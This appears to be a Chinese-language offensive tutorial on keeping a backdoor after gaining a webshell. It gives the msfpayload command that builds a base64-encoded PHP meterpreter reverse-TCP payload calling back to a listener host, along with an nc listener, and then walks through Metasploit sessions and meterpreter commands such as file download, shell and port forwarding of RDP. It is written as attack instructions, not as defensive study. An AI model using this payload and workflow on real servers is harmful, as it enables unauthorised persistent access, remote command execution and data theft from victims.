1、前期--
情景就是当我们获得webshell时,我们想留下我们的后门,这个时候我们可以用到msfpayload与msfconsole结合使用
启动PostgreSQL服务:service postgresql start
启动metasploit服务:service metasploit start
启动msfconsole:msfconsole
查看数据库连接状态:db_status
生成后门文件
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php
exp.php需要加上<?php ?>
攻击端启动监听
或者
nc 192.168.133.128 -lvp 5555
然后去访问我们的后门文件
2、大家想保存我们得到的session怎么办?首先必须连接数据库
exploit -h -e <opt> The payload encoder to use. If none is specified, ENCODER is used. 有效负载编码,默认使用 -f Force the exploit to run regardless of the value of MinimumRank. -h Help banner. -j Run in the context of a job. 在后台中运行 -n <opt> The NOP generator to use. If none is specified, NOP is used. -o <opt> A comma separated list of options in VAR=VAL format. -p <opt> The payload to use. If none is specified, PAYLOAD is used. -t <opt> The target index to use. If none is specified, TARGET is used. -z Do not interact with the session after successful exploitation 建立会话放到后台
sessions -h -K Terminate all sessions 杀死所有sessions -c <opt> Run a command on the session given with -i, or all 执行一个命令 -d <opt> Detach an interactive session -h Help banner -i <opt> Interact with the supplied session ID 连接会话 -k <opt> Terminate sessions by session ID and/or range -l List all active sessions -q Quiet mode -r Reset the ring buffer for the session given with -i, or all -s <opt> Run a script on the session given with -i, or all -t <opt> Set a response timeout (default: 15) -u <opt> Upgrade a shell to a meterpreter session on many platforms -v List verbose fields
3、meterpreter使用
Core Commands 代码命令 ============= Command Description ------- ----------- ? Help menu 查看帮助 background Backgrounds the current session 将sessions保存到后台 bgkill Kills a background meterpreter script 杀死后台meterpreter脚本 bglist Lists running background scripts 列出后台meterpreter脚本 bgrun Executes a meterpreter script as a background thread 在后台进程中执行一个脚本 channel Displays information about active channels 显示活动的通道 close Closes a channel 关闭通道 disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session 退出 help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode 开启ruby终端 load Load one or more meterpreter extensions quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel Stdapi: File system Commands 文件命令 ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands 网络命令 =========================== Command Description ------- ----------- portfwd Forward a local port to a remote service 端口转发
portfwd add -l 5555 -p 3389 -r 192.168.198.129 将192.168.198.129的3389端口转发到本地的5555端口 Stdapi: System Commands ======================= Command Description ------- ----------- execute Execute a command 执行命令 getenv Get one or more environment variable values getpid Get the current process identifier getuid Get the user that the server is running as kill Terminate a process ps List running processes shell Drop into a system command shell 生成一个shell sysinfo Gets information about the remote system, such as OS 查看系统信息
附上:初探meterpreter